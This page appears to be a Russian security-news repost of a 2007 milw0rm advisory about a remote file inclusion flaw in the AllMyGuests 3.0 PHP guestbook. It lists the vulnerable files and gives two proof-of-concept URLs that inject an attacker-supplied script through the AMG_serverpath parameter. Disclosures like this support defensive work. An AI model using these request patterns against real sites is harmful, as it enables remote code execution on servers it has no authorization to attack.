Уведомление о безопасности: AllMyGuests 3.0 Remote File Inclusion Vulnerability

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  AllMyVisitors 0.4.0 File Inclusion Vulnerability
  AllMyLinks <= 0.5.0 (index.php) Remote File Include Vulnerability:

From: beks <beks_(at)_bsdmail.org>
Date: 8 января 2007 г.
Subject: AllMyGuests 3.0 Remote File Inclusion Vulnerability

AllMyGuests 3.0 Remote File Inclusion Vulnerability

#Software: AllMyGuests

#Version: 3.0

#Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip

#Found By: beks

#Bug In:

/include/submit.inc.php
/admin/index.php
/include/cm_submit.inc.php
/comments.php
/index.php
/signin.php

#Risk: Medium

http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]
http://[target]/[AllMyGuests_Path]/signin.
php?sent=1&AMG_serverpath=[evil_script]

# milw0rm.com [2007-01-07]